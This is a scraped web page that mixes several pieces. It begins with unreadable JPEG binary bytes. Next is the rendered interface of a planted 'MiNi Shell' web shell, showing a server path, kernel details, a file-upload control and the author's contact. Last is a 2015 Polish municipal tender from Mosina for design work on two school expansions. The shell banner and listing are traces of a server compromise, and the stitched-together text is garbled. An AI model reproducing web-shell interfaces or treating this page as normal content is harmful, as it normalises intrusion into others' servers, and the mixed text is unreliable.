JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150415/85376-N-2015.html

<p class="kh_header"><b>Mosina: Opracowanie pełnej dokumentacji technicznej dla zadań:
Zadanie nr 1 - Rozbudowa Szkoły Podstawowej w Czapurach, gm. Mosina

Zadanie nr 2 - Rozbudowa Szkoły Podstawowej w Krosinku, gm. Mosina</b><br>
<b>Numer ogłoszenia: 85376 - 2015; data zamieszczenia: 15.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Mosina , Pl. 20 Października 1, 62-050 Mosina, woj. wielkopolskie, tel. 61 8109500, faks 61 8109558.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mosina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie pełnej dokumentacji technicznej dla zadań:
Zadanie nr 1 - Rozbudowa Szkoły Podstawowej w Czapurach, gm. Mosina

Zadanie nr 2 - Rozbudowa Szkoły Podstawowej w Krosinku, gm. Mosina.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi: 
Opracowanie pełnej dokumentacji technicznej dla zadań:
Zadanie nr 1 - Rozbudowa Szkoły Podstawowej w Czapurach, gm. Mosina
Istniejący budynek szkoły usytuowany jest w Czapurach  przy ul. Poznańskiej 78.
UWAGA : 
Dokumentację projektową należy opracować zgodnie z posiadaną przez Zamawiającego   
koncepcją opracowaną przez Pracownię Projektową PROARCHIT Renata Zacharczuk.
Koncepcja stanowi załącznik nr 7 do SIWZ
Poszczególne etapy projektowania należy uzgadniać na bieżąco z Zamawiającym. 
Termin realizacji - Zamawiający określa jako termin , do którego należy złożyć w Starostwie Wniosek o pozwolenie na budowę.
Płatność - Projektant składa fakturę za całość wykonanej usługi w momencie kiedy Zamawiający otrzyma Pozwolenie na budowę. 
Zakresem prac należy objąć:
Doprojektowanie kolejnej bryły o 3 kondygnacjach nadziemnych, która pomieści:
12 pełnowymiarowych sal lekcyjnych
sala do gimnastyki korekcyjnej z zapleczem
szatnie dla dzieci - szatnie boksowe  z przedzieleniem ażurowym 
WC damski i męski dla dzieci
WC dla personelu
WC dla niepełnosprawnych
pomieszczenia biurowe
pomieszczenie socjalne
pomieszczenia gospodarcze ( 1 z wyjściem na zewnątrz)
stołówkę z zapleczem + świetlicę
bibliotekę
windę
skrzydła rozsuwane na całej ścianie pomiędzy świetlicą a stołówką 
2.zaprojektowanie sali gimnastycznej:
docelowo sala główna ma mieć wymiary podłogi 30x18 m. sala dostosowana ma być do prowadzenia zajęć w grupach.
kotara grodząca salę na 2 części - automatyczna lub ręczna
 Ponadto należy uwzględnić następujące elementy infrastruktury:
trybuny rozkładane dla widzów - 150 siedzisk (każdorazowo trybuny należy uwzględnić poza obrysem sali głównej)
zaplecze - pomieszczenie na sprzęt sportowy (piłki, stoły do tenisa, siatki, drążki, skrzynie, materace, kozły itp.)
pomieszczenie dla salki do gimnastyki korekcyjnej z zapleczem
pomieszczenie dla nauczycieli i instruktorów sportu z zapleczem sanitarnym i prysznicem
pomieszczenie dla pracowników obsługi
magazyn na sprzęt gospodarczy i środki czystości
4 szatnie z prysznicami i toaletami
toaleta ogólnodostępna 
wentylacje  mechaniczne 
wyposażenie sali gimnastyczne
boisko do koszykówki z opuszczanymi koszami,boisko do siatkówki z słupkami,boisko do piłki ręcznej z bramkami , tablica punktacyjna sterowana zdalnie,nagłośnienie sali otwieranie elektryczne górnych okien,siatki  ochronne,drabinki. 
budynek powinien być również wyposażony w:alarmy i instalacje przeciw włamaniowe monitoring (kamery na zewnątrz budynku i wewnątrz budynku , centrala - rejestrator , monitory),instalacje odgromowe,sieci strukturalne do internetu,instalację dzwonkową,instalację telefoniczną,instalację głośnikową ,instalację otwierania głównych drzwi wejściowych
Projektant zobowiązany jest również do uzyskania POZWOLENIA NA BUDOWĘ. 
Zadanie nr 2 - Rozbudowa Szkoły Podstawowej w Krosinku, gm. Mosina
Istniejący budynek szkoły usytuowany jest w  Krosinku przy ul. Wiejskiej 43
UWAGA : 
Dokumentację projektową należy opracować zgodnie z posiadaną przez Zamawiającego koncepcją opracowaną przez Pracownię Projektową PROARCHIT Renata Zacharczuk.
Koncepcja stanowi załącznik nr 8 do SIWZ
Poszczególne etapy projektowania należy uzgadniać na bieżąco z Zamawiającym. 
Termin realizacji - Zamawiający określa jako termin , do którego należy złożyć w Starostwie  Powiatowym Wniosek o pozwolenie na budowę.
Płatność - Projektant składa fakturę za całość wykonanej usługi w momencie kiedy Zamawiający otrzyma od Wykonawcy  Pozwolenie na budowę. 
Zakresem prac należy objąć:
1.	Doprojektowanie kolejnej bryły o 3 kondygnacjach nadziemnych, która pomieści:
a.	6 pełnowymiarowych sal lekcyjnych
b.	sala do gimnastyki korekcyjnej z zapleczem 
c.	szatnie dla dzieci
d.	WC damski i męski dla dzieci
e.	WC dla personelu
f.WC dla niepełnosprawnych
g.pomieszczenia biurowe
h.pomieszczenie socjalne
i.pomieszczenia gospodarcze ( 1 z wyjściem na zewnątrz)
j.świetlicę + pomieszczenie kuchenne dla cateringu
k.	bibliotekę
l.windę
m.kotłownię
2.	zaprojektowanie sali gimnastycznej:
a.	docelowo sala główna ma mieć wymiary podłogi 28x16 m. sala dostosowana ma być do prowadzenia zajęć w grupach.
b.	kotara grodząca salę na 2 części - automatyczna lub ręczna
 Ponadto należy uwzględnić następujące elementy infrastruktury:
c.	trybuny rozkładane dla widzów - ok. 150
d.	zaplecze - pomieszczenie na sprzęt sportowy (piłki, stoły do tenisa, siatki, drążki, skrzynie, materace, kozły itp.)
e.	pomieszczenie dla salki do gimnastyki korekcyjnej z zapleczem
f.	pomieszczenie dla nauczycieli i instruktorów sportu z zapleczem sanitarnym i prysznicem
g.	pomieszczenie dla pracowników obsługi
h.	magazyn na sprzęt gospodarczy i środki czystości
i.	4 szatnie z prysznicami i toaletami
j.	toaleta ogólnodostępna 
k.	wentylacja mechaniczna
l.	wyposażenie sali gimnastycznej
- boisko do koszykówki z opuszczanymi koszami 
- boisko do siatkówki z słupkami
- bosko do piłki ręcznej z bramkami
- tablica punktacyjna sterowana zdalnie 
- nagłośnienie sali
- otwieranie elektryczne górnych okien
- siatki ochronne 
- drabinki
3.	budynek powinien być również wyposażony w:
a.	alarmy i instalacje przeciw włamaniowe 
b.	monitoring (kamery na zewnątrz budynku i wewnątrz budynku, centrala - rejestrator , monitory)
c.	instalacje odgromowe
d.	sieci strukturalne do internetu
e.	instalację dzwonkową
f.	instalację telefoniczną
g.	instalacja głośnikowa
h.	instalacja otwierania głównych drzwi wejściowych

Projektant zobowiązany jest również do uzyskania POZWOLENIA NA BUDOWĘ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.30.00-7, 71.22.00.00-6, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 7.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium.
Ustala się wadium dla zadania nr 1 w wysokości: 2 000,00  zł
słownie: dwa tysiące złotych.
Ustala się wadium dla zadania nr 2 w wysokości: 2 000,00  zł
słownie: dwa tysiące złotych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie skonkretyzował tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 usługę polegającą na opracowaniu dokumentacji  obejmującej rozbudowę lub budowę budynku wraz z salą gimnastyczną o wartości projektu nie mniejszej niż 70.000 zł.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie skonkretyzował tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie skonkretyzował tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie skonkretyzował tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zgodnie z art. 26 ust. 2b ustawy Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin realizacji - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zgodnie z art. 144 ust. 1 Pzp Zamawiający zastrzega możliwość zmian umowy w zakresie terminu wykonania - w przypadku wystąpienia następujących zdarzeń:
a) siły wyższej nie pozwalającej na realizację umowy: termin wykonania zamówienia może ulec zmianie o okres odpowiadający wstrzymaniu lub opóźnieniu prac z tego powodu - jeżeli przy zachowaniu należytej staranności z uwzględnieniem profesjonalnego charakteru wykonawcy nie można było uniknąć zmiany terminu wykonania umowy,
b)  ponadprzeciętnego czasu trwania procedur administracyjnych, mającego wpływ na termin wykonania i nie wynikającego z przyczyn leżących po stronie Wykonawcy - jeżeli przy zachowaniu należytej staranności z uwzględnieniem profesjonalnego charakteru wykonawcy nie można było uniknąć zmiany terminu wykonania umowy,
c)  innych przyczyn leżących po stronie Zamawiającego lub organów administracji.
2. Strona, która zamierza żądać zwolnienia z odpowiedzialności z powodu siły wyższej zobowiązana jest powiadomić drugą Stronę na piśmie, bez zbędnej zwłoki, o jej zajściu i ustaniu.
3.   Nie stanowi zmiany umowy zmiana osób skierowanych do wykonania przedmiotu umowy i adresów wskazanych w umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mosina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Mosinie
Pl. 20 Października 1
62-050 Mosina.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.04.2015 godzina 10:50, miejsce: Urząd Miejski w Mosinie
Pl. 20 Października 1
62-050 Mosina
pokój nr 107.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com